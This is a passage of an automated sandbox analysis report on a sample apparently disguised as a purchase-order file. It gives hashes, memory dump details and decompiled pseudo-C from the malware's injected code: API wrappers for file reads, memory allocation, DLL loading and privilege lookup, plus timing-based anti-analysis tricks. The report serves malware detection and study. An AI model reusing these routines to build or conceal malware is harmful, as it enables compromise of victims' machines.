                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07C6879D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.470370712.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7c60000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: ba86a29ae1355f085c58081953540a5f1e62600acf5033d97921f3d7f8838161
                                                                                            • Instruction ID: cfb35bcfb90144f116e6ea488cc820ff560b1b56301cce87ce410d7c673aab15
                                                                                            • Opcode Fuzzy Hash: ba86a29ae1355f085c58081953540a5f1e62600acf5033d97921f3d7f8838161
                                                                                            • Instruction Fuzzy Hash: 9E11E5B5800349DFDB10CF99D888BDEBBF8FB48324F148819E954A7240C375A984CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.460412452.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.460401848.0000000000EB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.460515333.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eb0000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-1037565863
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.460412452.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.460401848.0000000000EB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.460515333.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_eb0000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-1037565863
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.463043449.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_3080000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:3%
                                                                                            Total number of Nodes:737
                                                                                            Total number of Limit Nodes:89
15909->15710 15911 419700 LdrLoadDll 15910->15911 15912 40d731 15911->15912 15912->15905 15912->15906

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 108 418a6b-418a6f 109 418a71-418aa9 call 419700 108->109 110 418ac6-418b01 call 419700 NtCreateFile 108->110
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408F43,?,7@A,00408F43,FFFFFFFF,?,?,FFFFFFFF,00408F43,00414037,?,00408F43,00000060,00000000,00000000), ref: 00418AFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: 7@A
                                                                                            • API String ID: 823142352-801575940
                                                                                            • Opcode ID: 727cddaded19434ab991283a0ee689947c9faa0335fc795ee00e6bec7a012498
                                                                                            • Instruction ID: 4b51124e3bd61a4573ec68487a2c8b36153702ea6e10e8ed1eb9459a9a787ba8
                                                                                            • Opcode Fuzzy Hash: 727cddaded19434ab991283a0ee689947c9faa0335fc795ee00e6bec7a012498
                                                                                            • Instruction Fuzzy Hash: 6F11D0B2214108AFCB08DF98DC95EEB77AEAF8C754F148249FA1D97241D634EC51CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 124 418ab0-418b01 call 419700 NtCreateFile
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418AB0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                            				long _t21;
                                                                                            
                                                                                            				_t3 = _a4 + 0xc48; // 0xc48
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                                            				_t11 =  &_a20; // 0x414037
                                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                            				return _t21;
                                                                                            			}





                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408F43,?,7@A,00408F43,FFFFFFFF,?,?,FFFFFFFF,00408F43,00414037,?,00408F43,00000060,00000000,00000000), ref: 00418AFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: 7@A
                                                                                            • API String ID: 823142352-801575940
                                                                                            • Opcode ID: 0b4a7f69a494bee332e540e635ee0ed8593f4757e071c339ca62754d47a116a7
                                                                                            • Instruction ID: c30b5ff41096a2f60b4068db598543ba47d231afbfc6f97fb99956b13c0b0e1d
                                                                                            • Opcode Fuzzy Hash: 0b4a7f69a494bee332e540e635ee0ed8593f4757e071c339ca62754d47a116a7
                                                                                            • Instruction Fuzzy Hash: D3F0B2B2210108ABCB48CF89DC95EDB37ADAF8C754F018208FA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 258 409f70-409f99 call 41b550 261 409f9b-409f9e 258->261 262 409f9f-409fad call 41b970 258->262 265 409fbd-409fce call 419ca0 262->265 266 409faf-409fba call 41bbf0 262->266 271 409fd0-409fe4 LdrLoadDll 265->271 272 409fe7-409fea 265->272 266->265 271->272
                                                                                            C-Code - Quality: 100%
                                                                                            			E00409F70(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                            				char* _v8;
                                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                                            				char _v536;
                                                                                            				void* _t15;
                                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                                            				void* _t30;
                                                                                            				void* _t31;
                                                                                            				void* _t32;
                                                                                            
                                                                                            				_v8 =  &_v536;
                                                                                            				_t15 = E0041B550( &_v12, 0x104, _a8);
                                                                                            				_t31 = _t30 + 0xc;
                                                                                            				if(_t15 != 0) {
                                                                                            					_t17 = E0041B970(__eflags, _v8);
                                                                                            					_t32 = _t31 + 4;
                                                                                            					__eflags = _t17;
                                                                                            					if(_t17 != 0) {
                                                                                            						E0041BBF0( &_v12, 0);
                                                                                            						_t32 = _t32 + 8;
                                                                                            					}
                                                                                            					_t18 = E00419CA0(_v8);
                                                                                            					_v16 = _t18;
                                                                                            					__eflags = _t18;
                                                                                            					if(_t18 == 0) {
                                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                            						return _v16;
                                                                                            					}
                                                                                            					return _t18;
                                                                                            				} else {
                                                                                            					return _t15;
                                                                                            				}
                                                                                            			}














                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409FE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction ID: fc6c4bb0cb3bb0ea2982c011419b504ef06d4261b74d5fd86f1638fcb4569986
                                                                                            • Opcode Fuzzy Hash: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction Fuzzy Hash: EB0100B5D0010EABDB10DAA5DC42FDEB7B89B54308F0041A9E908A7281F635EA54CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 273 418b5a-418ba9 call 419700 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(004141F2,5D0515AF,FFFFFFFF,00413EB1,?,?,004141F2,?,00413EB1,FFFFFFFF,5D0515AF,004141F2,?,00000000), ref: 00418BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: fe87173da90e7ab8d86c4323b5fcac6f05fbaf98fb2144bf0ef1e897bdb8a2ca
                                                                                            • Instruction ID: 993ff9f11532132106c27203f05301c56ca38957beaa58fa7686b0e21a25551e
                                                                                            • Opcode Fuzzy Hash: fe87173da90e7ab8d86c4323b5fcac6f05fbaf98fb2144bf0ef1e897bdb8a2ca
                                                                                            • Instruction Fuzzy Hash: FBF0ECB6200108AFCB14DF99DC81DEB77A9EF8C354F158259F95DD7251D630E851CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 276 418b60-418b76 277 418b7c-418ba9 NtReadFile 276->277 278 418b77 call 419700 276->278 278->277
                                                                                            C-Code - Quality: 37%
                                                                                            			E00418B60(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                            				void* _t18;
                                                                                            				intOrPtr* _t27;
                                                                                            
                                                                                            				_t13 = _a4;
                                                                                            				_t27 = _a4 + 0xc50;
                                                                                            				E00419700( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                                                                            				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                                                            				return _t18;
                                                                                            			}






                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(004141F2,5D0515AF,FFFFFFFF,00413EB1,?,?,004141F2,?,00413EB1,FFFFFFFF,5D0515AF,004141F2,?,00000000), ref: 00418BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: d8a8e0eec9e23ace7ac2f4b4d174b46badc71d3dbf94d18e931e12570c500ada
                                                                                            • Instruction ID: b887ff3c00cba29ec2ae6da3904e2e26f8d9dc9ae1873c2c109b64804be14f43
                                                                                            • Opcode Fuzzy Hash: d8a8e0eec9e23ace7ac2f4b4d174b46badc71d3dbf94d18e931e12570c500ada
                                                                                            • Instruction Fuzzy Hash: 09F0AFB6210208ABCB14DF89DC85EEB77ADAF8C754F158249FA1DA7241D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 279 418c8a-418ccd call 419700 NtAllocateVirtualMemory
                                                                                            C-Code - Quality: 79%
                                                                                            			E00418C8A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                            				long _t16;
                                                                                            
                                                                                            				asm("cld");
                                                                                            				_t12 = _a4;
                                                                                            				_t3 = _t12 + 0xc68; // 0x3c68
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t12, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                                            				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                            				return _t16;
                                                                                            			}





                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041993D,?,0041993D,?,00000000,?,00003000,00000040,00408F43,00000000), ref: 00418CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: e1b80980550af702d06e2c0ee222753ab5caab41e6472034651e688422b5d5d8
                                                                                            • Instruction ID: e159302c8a4dfde50d61e01274343a535531dfb1bd2f334ad6a483b4737c54b3
                                                                                            • Opcode Fuzzy Hash: e1b80980550af702d06e2c0ee222753ab5caab41e6472034651e688422b5d5d8
                                                                                            • Instruction Fuzzy Hash: 10F085B6210208ABCB14DF88DC80EEB77ADAF88350F018208FE0897341C630ED10CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 282 418c90-418ca6 283 418cac-418ccd NtAllocateVirtualMemory 282->283 284 418ca7 call 419700 282->284 284->283
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418C90(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                            				long _t14;
                                                                                            
                                                                                            				_t3 = _a4 + 0xc68; // 0x3c68
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                            				return _t14;
                                                                                            			}

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041993D,?,0041993D,?,00000000,?,00003000,00000040,00408F43,00000000), ref: 00418CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: ab7b8ac6be900b1ce8f5504a61879f069c4a5f7f9a094fdb9308e93792aaba3f
                                                                                            • Instruction ID: 2266af49140b9cb7a2711c2afab94170beca4244258c459a17078da74b3b0697
                                                                                            • Opcode Fuzzy Hash: ab7b8ac6be900b1ce8f5504a61879f069c4a5f7f9a094fdb9308e93792aaba3f
                                                                                            • Instruction Fuzzy Hash: 6AF015B6210208ABCB14DF89DC81EEB77ADAF88754F018209FE0897241C630F810CBB4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 82%
                                                                                            			E00418BDA(void* __edx, intOrPtr _a4, void* _a8) {
                                                                                            				void* _v117;
                                                                                            				long _t9;
                                                                                            
                                                                                            				asm("repne xor dh, [ecx+ebx*2-0x66]");
                                                                                            				_t6 = _a4;
                                                                                            				_t3 = _t6 + 0x14; // 0x56c29f0f
                                                                                            				_t4 = _t6 + 0xc58; // 0x409b9b
                                                                                            				E00419700( *_t3, _a4, _t4,  *_t3, 0, 0x2c);
                                                                                            				_t9 = NtClose(_a8); // executed
                                                                                            				return _t9;
                                                                                            			}

                                                                                            APIs
                                                                                            • NtClose.NTDLL(004141D0,?,?,004141D0,00408F43,FFFFFFFF), ref: 00418C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: ec0a4ebd0f371e89123fc22c37460b8250d9d7c0f0abe7a408fa17f1e76ec42a
                                                                                            • Instruction ID: 16ed77bf063286cab575f0d1f476c4cded52c9863c0e2e177692ed5bb1409710
                                                                                            • Opcode Fuzzy Hash: ec0a4ebd0f371e89123fc22c37460b8250d9d7c0f0abe7a408fa17f1e76ec42a
                                                                                            • Instruction Fuzzy Hash: 05E08C75600144BBD721DFB89C86EDB3F6ADF85260F144099F948AB262C532EA41C7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E00418BE0(intOrPtr _a4, void* _a8) {
                                                                                            				long _t8;
                                                                                            
                                                                                            				_t5 = _a4;
                                                                                            				_t2 = _t5 + 0x14; // 0x56c29f0f
                                                                                            				_t3 = _t5 + 0xc58; // 0x409b9b
                                                                                            				E00419700( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                            				_t8 = NtClose(_a8); // executed
                                                                                            				return _t8;
                                                                                            			}

                                                                                            APIs
                                                                                            • NtClose.NTDLL(004141D0,?,?,004141D0,00408F43,FFFFFFFF), ref: 00418C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 126a5657bfa458edb9a3911ca33ea7b7fbc5fc36c9e97d7aa6f669463e901713
                                                                                            • Instruction ID: eb8d0a7e73eb43beade44ddd3ae991b8ba5f944d69645f0ee69a28326501a28a
                                                                                            • Opcode Fuzzy Hash: 126a5657bfa458edb9a3911ca33ea7b7fbc5fc36c9e97d7aa6f669463e901713
                                                                                            • Instruction Fuzzy Hash: FDD01776210214BBD610EFD9DC89ED77BADDF48660F014055FA186B282C930FA40C6E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E00408D10(signed int _a4) {
                                                                                            				intOrPtr _v8;
                                                                                            				char _v24;
                                                                                            				char _v284;
                                                                                            				char _v804;
                                                                                            				char _v840;
                                                                                            				void* _t24;
                                                                                            				void* _t31;
                                                                                            				void* _t33;
                                                                                            				void* _t34;
                                                                                            				signed int* _t39;
                                                                                            				char* _t43;
                                                                                            				void* _t49;
                                                                                            				signed int _t51;
                                                                                            				void* _t54;
                                                                                            				void* _t55;
                                                                                            				void* _t56;
                                                                                            				void* _t57;
                                                                                            
                                                                                            				_t51 = _a4;
                                                                                            				_t39 = 0; // executed
                                                                                            				_t24 = E004071C0(_t51,  &_v24); // executed
                                                                                            				_t55 = _t54 + 8;
                                                                                            				if(_t24 != 0) {
                                                                                            					E004073D0( &_v24,  &_v840);
                                                                                            					_t56 = _t55 + 8;
                                                                                            					do {
                                                                                            						E0041A6D0( &_v284, 0x104);
                                                                                            						E0041AD40( &_v284,  &_v804);
                                                                                            						_t57 = _t56 + 0x10;
                                                                                            						_t49 = 0x4f;
                                                                                            						while(1) {
                                                                                            							_t31 = E00414270(E00414210(_t51, _t49),  &_v284);
                                                                                            							_t57 = _t57 + 0x10;
                                                                                            							if(_t31 != 0) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t49 = _t49 + 1;
                                                                                            							if(_t49 <= 0x62) {
                                                                                            								continue;
                                                                                            							} else {
                                                                                            							}
                                                                                            							goto L8;
                                                                                            						}
                                                                                            						_t9 = _t51 + 0x18; // 0x5e14c483
                                                                                            						 *(_t51 + 0x478) =  *(_t51 + 0x478) ^  *_t9;
                                                                                            						_t39 = 1;
                                                                                            						L8:
                                                                                            						_t33 = E00407400( &_v24,  &_v840);
                                                                                            						_t56 = _t57 + 8;
                                                                                            					} while (_t33 != 0 && _t39 == 0);
                                                                                            					_t43 =  &_v24;
                                                                                            					_t34 = E00407480(_t51, _t43); // executed
                                                                                            					if(_t39 == 0) {
                                                                                            						asm("rdtsc");
                                                                                            						 *_t39 =  *_t39 ^ _t51;
                                                                                            						asm("rdtsc");
                                                                                            						_v8 = _t34 - _t43 + _t34;
                                                                                            						 *((intOrPtr*)(_t51 + 0x560)) =  *((intOrPtr*)(_t51 + 0x560)) + 0xffffffba;
                                                                                            					}
                                                                                            					 *((intOrPtr*)(_t51 + 0x35)) =  *((intOrPtr*)(_t51 + 0x35)) + _t39;
                                                                                            					_t20 = _t51 + 0x35; // 0xffff43e8
                                                                                            					 *((intOrPtr*)(_t51 + 0x36)) =  *((intOrPtr*)(_t51 + 0x36)) +  *_t20 + 1;
                                                                                            					return 1;
                                                                                            				} else {
                                                                                            					return _t24;
                                                                                            				}
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f3df2afbf45e6a43c218db93a3b40b511cd449a3fc1eb436c3592c33f752c29
                                                                                            • Instruction ID: af3d230e5c2ca14dce7ffbd4d7df7c3bdf8625ecd8843d16e1e6e862e82d41e5
                                                                                            • Opcode Fuzzy Hash: 3f3df2afbf45e6a43c218db93a3b40b511cd449a3fc1eb436c3592c33f752c29
                                                                                            • Instruction Fuzzy Hash: 43210CB2D4010957CB14D660AD41AEB73AC9F64304F44057FF989A31C1F63CBB4987A6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 418ec5-418ecc 117 418f11-418f3a call 419700 116->117 118 418ece-418f10 call 419700 116->118 122 418f3f-418f54 LookupPrivilegeValueW 117->122
                                                                                            C-Code - Quality: 29%
                                                                                            			E00418EC5(signed int __eax, void* __ecx, void* __esi, intOrPtr _a3, intOrPtr _a7, WCHAR* _a11, WCHAR* _a15, struct _LUID* _a19, intOrPtr _a23, char _a27) {
                                                                                            				char _v1;
                                                                                            				int _t24;
                                                                                            				intOrPtr* _t46;
                                                                                            
                                                                                            				if((__eax & 0xd60339cb) != 0) {
                                                                                            					_pop(ds);
                                                                                            					asm("rol byte [ecx], cl");
                                                                                            					asm("ficomp word [eax+0xc]");
                                                                                            					_push( &_v1);
                                                                                            					_t21 = _a7;
                                                                                            					_push(__esi);
                                                                                            					E00419700( *((intOrPtr*)(_a7 + 0xa1c)), _a7, _t21 + 0xc94,  *((intOrPtr*)(_a7 + 0xa1c)), 0, 0x46);
                                                                                            					_t24 = LookupPrivilegeValueW(_a11, _a15, _a19); // executed
                                                                                            					return _t24;
                                                                                            				} else {
                                                                                            					_t25 = _a3;
                                                                                            					_t4 = _t25 + 0xc90; // 0xd94
                                                                                            					_t46 = _t4;
                                                                                            					E00419700( *((intOrPtr*)(_a3 + 0xa18)), _a3, _t46,  *((intOrPtr*)(_a3 + 0xa18)), 0, 0x39);
                                                                                            					_t5 =  &_a27; // 0x40ed6e
                                                                                            					return  *((intOrPtr*)( *_t46))(_a7, _a11, _a15, _a19, _a23,  *_t5, __esi,  &_v1);
                                                                                            				}
                                                                                            			}







                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D3F2,0040D3F2,00000041,00000000,?,00408FB5), ref: 00418F50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID: n@P
                                                                                            • API String ID: 3899507212-977122041
                                                                                            • Opcode ID: 04d6558dea2fa0bacb06b508c832465add97f0068882ee2754069652d2733816
                                                                                            • Instruction ID: 353fccd347e31793cac348406ec5d1dda16fbd14f99b9de6a531937be081159c
                                                                                            • Opcode Fuzzy Hash: 04d6558dea2fa0bacb06b508c832465add97f0068882ee2754069652d2733816
                                                                                            • Instruction Fuzzy Hash: 261155B5214104AFDB00DF59CC81CE77BA8EF49320F18865EFC9D87202C634E851CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 128 418d80-418db1 call 419700 RtlAllocateHeap
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418D80(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                                                                            				void* _t10;
                                                                                            
                                                                                            				E00419700( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc78,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                                            				_t4 =  &_a16; // 0x41412f
                                                                                            				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                                                                            				return _t10;
                                                                                            			}





                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(004139B6,?,/AA,0041412F,?,004139B6,?,?,?,?,?,00000000,00408F43,?), ref: 00418DAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID: /AA
                                                                                            • API String ID: 1279760036-619304845
